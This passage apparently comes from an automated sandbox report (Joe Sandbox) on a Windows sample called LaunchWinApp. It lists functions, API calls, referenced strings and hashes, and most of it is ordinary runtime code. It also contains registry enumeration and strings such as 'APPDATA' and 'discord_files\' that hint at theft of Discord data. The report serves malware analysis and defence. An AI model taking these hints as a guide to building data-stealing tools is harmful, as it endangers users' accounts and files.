                    • _free.LIBCMT ref: 00456306
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID: *G
                    • API String ID: 3033488037-1675791495
                    • Opcode ID: f8577adaab9910ea722f9f161f160b3b914e6e0f172bf18cc7ce985ceace9343
                    • Instruction ID: 147b10e0cb8e21a4000cd6140936ae270599cd50b43794ea4c7350c1b8b69960
                    • Opcode Fuzzy Hash: f8577adaab9910ea722f9f161f160b3b914e6e0f172bf18cc7ce985ceace9343
                    • Instruction Fuzzy Hash: F651F331A00704AFDB21EF69C841B6AB3F4EF44725F5105AEEC45D7252EB39D909CB48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00422D3C
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeallocateH_prolog
                    • String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
                    • API String ID: 3708980276-4239264347
                    • Opcode ID: ef6c82a70dcf080e4c060910962267f752c1d0c346e6453d4f8409ad3b0d79ae
                    • Instruction ID: fcda2e6445ee0425a63b07570e3e869be8fe5f46b6fb1a3b03421a01159bfcef
                    • Opcode Fuzzy Hash: ef6c82a70dcf080e4c060910962267f752c1d0c346e6453d4f8409ad3b0d79ae
                    • Instruction Fuzzy Hash: 0F712D70D00208EFCB14EFAAD591AEDBBB5AF58308F50806EE115B3241DB785B48CF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: 6670657ba50edfb3a4d4a5ca787a6a76dbe60270d5ae99e2eb4c1c05e4ae5940
                    • Instruction ID: c3d1baa9da06ef8cc65c942294fc4062f05f43b26202022e774fd8206233c614
                    • Opcode Fuzzy Hash: 6670657ba50edfb3a4d4a5ca787a6a76dbe60270d5ae99e2eb4c1c05e4ae5940
                    • Instruction Fuzzy Hash: D9510330B00218AFDB04EF15D496BEA7BB5EF05314F85805EE8099F382DB78A954CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: bb176a35225330e52de8d2523d890112949f1947ab42f08ac32098444ee176a2
                    • Instruction ID: 30e399d24fea88ec1c53356056b021f969437eebc71411a4ee76acaf90e741fa
                    • Opcode Fuzzy Hash: bb176a35225330e52de8d2523d890112949f1947ab42f08ac32098444ee176a2
                    • Instruction Fuzzy Hash: 40510230B002149FDB04EF15E492BAA7BB5EF05318F85809EE8059F282DB78ED54CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: ce19ade8b77b160815a394a31b1fd80d281517679317dd4c711bc279f61eaa74
                    • Instruction ID: d9f82150163121a9fc382f7adb080dce3a27f4e592ef338535a5621d04b0c61f
                    • Opcode Fuzzy Hash: ce19ade8b77b160815a394a31b1fd80d281517679317dd4c711bc279f61eaa74
                    • Instruction Fuzzy Hash: 50510530B042149FDB04EF15D896BAABBB5FF05314F84805EE8059F382DB78AD55CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: bb176a35225330e52de8d2523d890112949f1947ab42f08ac32098444ee176a2
                    • Instruction ID: 48c97a90ed83dd8ec5472155bee87f6b83def156cea23f41062e818627d4552e
                    • Opcode Fuzzy Hash: bb176a35225330e52de8d2523d890112949f1947ab42f08ac32098444ee176a2
                    • Instruction Fuzzy Hash: A651E130B04214DFDB14EF65D496BAA7BB5FF05314F84809EE8059B382DB78A944CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: 146cc1c9ae955d5725956463abfff2e5e48222a3b27dc766326634e4c864592e
                    • Instruction ID: 55145b81502e035c2fb4534a4493042b05bab1770afa2fbc671dbcece8c74ade
                    • Opcode Fuzzy Hash: 146cc1c9ae955d5725956463abfff2e5e48222a3b27dc766326634e4c864592e
                    • Instruction Fuzzy Hash: A351E430B042149FDB04EF15D496BAABBB5FF05314F84809EE8059F382DB78E945CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: 101979c3a2fce69e2987056232e3c9d2d8b7e9ba86eafceb8095c538fe9d9286
                    • Instruction ID: fc80bcc1d07a2eec472fc29509e8fe1870c7b14c2e93ed30cbb0faa9087feb1c
                    • Opcode Fuzzy Hash: 101979c3a2fce69e2987056232e3c9d2d8b7e9ba86eafceb8095c538fe9d9286
                    • Instruction Fuzzy Hash: 8A510530B005149FDB14EF15D496BAABBB5EF05324F84805EE805AF382DB78ED54CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                    • API String ID: 3519838083-2786698324
                    • Opcode ID: d166552a54265580f08e5c2104d2e7cfb2904fa273bc573b5e00c75b40e700a6
                    • Instruction ID: 5ca6af9ab81a62dfd3fdf3f15973e56d58e750c6512ef144523bfcc8cf6a1268
                    • Opcode Fuzzy Hash: d166552a54265580f08e5c2104d2e7cfb2904fa273bc573b5e00c75b40e700a6
                    • Instruction Fuzzy Hash: DF51D330B002249FDB04EF55D4A6BEA7BB5FF45314F44805EE805AB382DB78A954CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040AFB4
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040AFC4
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B001
                      • Part of subcall function 00440110: _Yarn.LIBCPMT ref: 0044012F
                      • Part of subcall function 00440110: _Yarn.LIBCPMT ref: 00440153
                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040B042
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040B0B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Locinfo::_LockitYarn$H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 3232797784-1405518554
                    • Opcode ID: a7c471d50db4d3742234741873950254388d183e28a7186e5430f06470a7d097
                    • Instruction ID: d7ae140111f86a4a430dd0138ca59e5604b24ddb406671570963c7a24e224798
                    • Opcode Fuzzy Hash: a7c471d50db4d3742234741873950254388d183e28a7186e5430f06470a7d097
                    • Instruction Fuzzy Hash: 38316F72905B00DFC7359F2AD841657FBE4FF48714B208A2FE09A92A51CB39A505CB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 0-537541572
                    • Opcode ID: c0217f0642b52b18cf49420db513abf35036cf3eb34fbf28a9513673bab114de
                    • Instruction ID: 75ee051d4fa704e2521ccae29eb6884850a75191e46566d638661042b110bddd
                    • Opcode Fuzzy Hash: c0217f0642b52b18cf49420db513abf35036cf3eb34fbf28a9513673bab114de
                    • Instruction Fuzzy Hash: 9F2138B1E01221ABDB214A259C40B7B37989F01761F24052AED05B7393DE78EC09CAEE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0043527F
                    • lstrlenW.KERNEL32(?), ref: 004352A5
                    • lstrcpyW.KERNEL32 ref: 004352C2
                    • lstrcatW.KERNEL32(00000000,0047E440), ref: 004352CE
                    • lstrcatW.KERNEL32(00000000,?), ref: 004352DC
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00435310
                    • RegCloseKey.ADVAPI32(?), ref: 0043531D
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
                    • String ID:
                    • API String ID: 2943937744-0
                    • Opcode ID: 0e4ee41c36ee3124c373d9545e755984cb845e3b6f874146656ee24472e8fca1
                    • Instruction ID: cd5cf4aacea876c366cfde92acba264a13c2d81f9f6ea03dd54c9f7238eba560
                    • Opcode Fuzzy Hash: 0e4ee41c36ee3124c373d9545e755984cb845e3b6f874146656ee24472e8fca1
                    • Instruction Fuzzy Hash: 3221517A501128FFEB119B92DD49DEF7BBCEF09394F0040A6F905D1110EBB45E41DAA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00461F14: _free.LIBCMT ref: 00461F39
                    • _free.LIBCMT ref: 00462216
                      • Part of subcall function 0045813E: HeapFree.KERNEL32(00000000,00000000,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?), ref: 00458154
                      • Part of subcall function 0045813E: GetLastError.KERNEL32(?,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?,?), ref: 00458166
                    • _free.LIBCMT ref: 00462221
                    • _free.LIBCMT ref: 0046222C
                    • _free.LIBCMT ref: 00462280
                    • _free.LIBCMT ref: 0046228B
                    • _free.LIBCMT ref: 00462296
                    • _free.LIBCMT ref: 004622A1
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: edb37aeed8800d3475c03bd78c3862b90e2031649d7118710ed7d63d68b1fba6
                    • Instruction ID: b7d7f4123409e1c93a31d8424639c0da092e7b3518518b458ec4db68dc78a5a3
                    • Opcode Fuzzy Hash: edb37aeed8800d3475c03bd78c3862b90e2031649d7118710ed7d63d68b1fba6
                    • Instruction Fuzzy Hash: EA115171540B08BAD520BBB2CC07FCBB79D6F40708F44481EB6E966463EF6DB5094769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetStdHandle.KERNEL32(000000F4,A:\_Work\rc-build-v1-exe\json.hpp,?), ref: 0044FAC6
                    • GetFileType.KERNEL32(00000000), ref: 0044FAD8
                    • swprintf.LIBCMT ref: 0044FAF9
                    • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0044FB36
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0044FAC0
                    • Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044FAEE
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleFileHandleTypeWriteswprintf
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$Assertion failed: %Ts, file %Ts, line %d
                    • API String ID: 2943507729-3717751166
                    • Opcode ID: 0784cccc9c1bf8d47b2b759b0198964a0e9c9f282762cafa1d716a15abbfb40b
                    • Instruction ID: 2c62605530fe9e79cfd3a72951418a5142b1112241a6f8760292d0bf387491ff
                    • Opcode Fuzzy Hash: 0784cccc9c1bf8d47b2b759b0198964a0e9c9f282762cafa1d716a15abbfb40b
                    • Instruction Fuzzy Hash: D11178715000186BDB209F29CD56EEFB3ACEF41350F4049AAFA1593181EA34FD098B6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422C14
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422C24
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422C34
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422C57
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$false
                    • API String ID: 2160870905-3678202009
                    • Opcode ID: 1915f19b102b3d6e8226c92676e2ee87dc3d25ba45c1f100cf7f0e6ea3b1c2f2
                    • Instruction ID: 6305c9c94702425323219a1285053c6f72e3dd366bc620f1f7a83dbf286c3e4b
                    • Opcode Fuzzy Hash: 1915f19b102b3d6e8226c92676e2ee87dc3d25ba45c1f100cf7f0e6ea3b1c2f2
                    • Instruction Fuzzy Hash: 4A115371B4022475CB1ABBAAFE9AEFF37246F00305FA0850FB40132691C6ED861EC21D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004476D0,?,?,00447698,000000FF,?,UQA), ref: 004476F0
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00447703
                    • FreeLibrary.KERNEL32(00000000,?,?,004476D0,?,?,00447698,000000FF,?,UQA), ref: 00447726
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$\1A$mscoree.dll
                    • API String ID: 4061214504-3337826627
                    • Opcode ID: ed59fb14b02857f7590c9ea736133f3eb2ef4bd79d4c3061eee84b6a22660037
                    • Instruction ID: e55f2363311ffb152dc95287ccf007a711bfd98483c88166c39d6972c370cbbb
                    • Opcode Fuzzy Hash: ed59fb14b02857f7590c9ea736133f3eb2ef4bd79d4c3061eee84b6a22660037
                    • Instruction Fuzzy Hash: B1F0A734501119FBDB119B91DC09FDE7FB9EB00756F104061F400B22A0EBB49E01EF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 0045773F
                    • __fassign.LIBCMT ref: 00457924
                    • __fassign.LIBCMT ref: 00457941
                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00457989
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004579C9
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00457A71
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                    • String ID:
                    • API String ID: 1735259414-0
                    • Opcode ID: bb337dae277e497586a57176db327e41eb037fd8ebfbe6399c84e533aa33c328
                    • Instruction ID: 6a3717290c53ed80be32effa8769c2799e8c55fd9dfe25d7b350c5038ecc5eab
                    • Opcode Fuzzy Hash: bb337dae277e497586a57176db327e41eb037fd8ebfbe6399c84e533aa33c328
                    • Instruction Fuzzy Hash: E9C1AFB5D042589FCF10CFA8D8809EDBBB5EF08315F28416AE855B7342E2359E4ACF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16
                    • String ID: a/p$am/pm
                    • API String ID: 3509577899-3206640213
                    • Opcode ID: a88ad6fc5e9771a152d3737713903e08dcfb710b71e5b7b69026dc099eb9a005
                    • Instruction ID: 80ec3662948bfb2d0a43e754b645e6b22c10ed2a1998558310f4b1d7a1760166
                    • Opcode Fuzzy Hash: a88ad6fc5e9771a152d3737713903e08dcfb710b71e5b7b69026dc099eb9a005
                    • Instruction Fuzzy Hash: 3FC1C0309402159ADB148FA8C485BBBB7B0FF8670AF14414BED01AF756D3399DCACB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0043AE21
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AE2F
                    • int.LIBCPMT ref: 0043AE46
                      • Part of subcall function 0040B0CB: std::_Lockit::_Lockit.LIBCPMT ref: 0040B0DC
                      • Part of subcall function 0040B0CB: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B0F6
                    • std::_Facet_Register.LIBCPMT ref: 0043AE80
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AE96
                    • Concurrency::cancel_current_task.LIBCPMT ref: 0043AEAB
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                    • String ID:
                    • API String ID: 2251497708-0
                    • Opcode ID: 39e6a226f42779e075a99bd6fd9bdaa9fc4c94db055b3ddce5ab1941c0e10beb
                    • Instruction ID: 0eaca251d43b7c1582b9e51cfad4196a16b8be0056e0621c5a7123b897a3bfe2
                    • Opcode Fuzzy Hash: 39e6a226f42779e075a99bd6fd9bdaa9fc4c94db055b3ddce5ab1941c0e10beb
                    • Instruction Fuzzy Hash: A1110431D406199FCB15EB95D806BBF7768EB48324F10452FF815AB2C1DB7C9E00879A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(?,?,00443D1B,00442816,00441485), ref: 00443D32
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00443D40
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00443D59
                    • SetLastError.KERNEL32(00000000,00443D1B,00442816,00441485), ref: 00443DAB
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: ea2095098b8ef40ca2b8c57d70f8f3870853234c2120859939b32a953a8cb9f6
                    • Instruction ID: 52a63c57e1e2eaa61ccc3210d23838540827820d24ce74351a840043bd10aa2f
                    • Opcode Fuzzy Hash: ea2095098b8ef40ca2b8c57d70f8f3870853234c2120859939b32a953a8cb9f6
                    • Instruction Fuzzy Hash: AF01F076518B155FFB242F76AC4591B1754EB01F76B30033FF410811E1EF594D45624C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID:
                    • API String ID: 1497175149-0
                    • Opcode ID: 0dd0892110a37bc9201c394f4bdf0bdd7a7fdf0edc5612075cede24231acf7ba
                    • Instruction ID: 8e5531d34cf804a41d62f52e586791ea4426aca56c348e814b6f1d867f8dd421
                    • Opcode Fuzzy Hash: 0dd0892110a37bc9201c394f4bdf0bdd7a7fdf0edc5612075cede24231acf7ba
                    • Instruction Fuzzy Hash: 2901C436501204BBDF10DF598C8189B7769DF88314755842EFD0997202D738FE0946A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 004145E2
                    • std::_Lockit::_Lockit.LIBCPMT ref: 004145F0
                    • int.LIBCPMT ref: 00414607
                      • Part of subcall function 0040B0CB: std::_Lockit::_Lockit.LIBCPMT ref: 0040B0DC
                      • Part of subcall function 0040B0CB: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B0F6
                    • std::_Facet_Register.LIBCPMT ref: 00414641
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00414657
                    • Concurrency::cancel_current_task.LIBCPMT ref: 0041466C
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                    • String ID:
                    • API String ID: 2251497708-0
                    • Opcode ID: 3382fefe8a2c9b990565058c22b878242a5b358caee0f055e4ff84009baeaea9
                    • Instruction ID: bc26f0bd73f21517c2ca4f7b709c7e5c6091d3ee1a50116247b38133b9962e5f
                    • Opcode Fuzzy Hash: 3382fefe8a2c9b990565058c22b878242a5b358caee0f055e4ff84009baeaea9
                    • Instruction Fuzzy Hash: B411CE72D001199BCB14AB64D805AEE7764EF85358F100A2FF825AB2C1DB7C9D04879D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00414C10
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00414C1E
                    • int.LIBCPMT ref: 00414C35
                      • Part of subcall function 0040B0CB: std::_Lockit::_Lockit.LIBCPMT ref: 0040B0DC
                      • Part of subcall function 0040B0CB: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B0F6
                    • std::_Facet_Register.LIBCPMT ref: 00414C6F
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00414C85
                    • Concurrency::cancel_current_task.LIBCPMT ref: 00414C9A
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                    • String ID:
                    • API String ID: 2251497708-0
                    • Opcode ID: 84a36a9e47755f4ba48bdb754d9db14245d4652a8e0e3a412f91805d313f75f3
                    • Instruction ID: ffaf735b7b630aeb951f5f5be7d53bac40b664ad994be057bc4bfab0866c98e5
                    • Opcode Fuzzy Hash: 84a36a9e47755f4ba48bdb754d9db14245d4652a8e0e3a412f91805d313f75f3
                    • Instruction Fuzzy Hash: 2411E571D011159BCB15EF64C809AEE77A5EF84328F10492FF815A72C1EB789E04C7D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0043AEE7
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AEF5
                    • int.LIBCPMT ref: 0043AF0C
                      • Part of subcall function 0040B0CB: std::_Lockit::_Lockit.LIBCPMT ref: 0040B0DC
                      • Part of subcall function 0040B0CB: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B0F6
                    • std::_Facet_Register.LIBCPMT ref: 0043AF46
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AF5C
                    • Concurrency::cancel_current_task.LIBCPMT ref: 0043AF71
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                    • String ID:
                    • API String ID: 2251497708-0
                    • Opcode ID: 5ebe1cb7329294f4bbc1c9b3572fdd815ce6186b68b10d0ddff4756c2f9bcec1
                    • Instruction ID: c306088514646d633c910f136ed03df30253c506db8b3f17b147bd91f965ccc2
                    • Opcode Fuzzy Hash: 5ebe1cb7329294f4bbc1c9b3572fdd815ce6186b68b10d0ddff4756c2f9bcec1
                    • Instruction Fuzzy Hash: 1011E572D001159BCB18EB54D8456BE7774EF48328F10052FF815A72C1DB789D04C799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: APPDATA$Q%>#064$discord_files\$m}qlz
                    • API String ID: 3519838083-1980083310
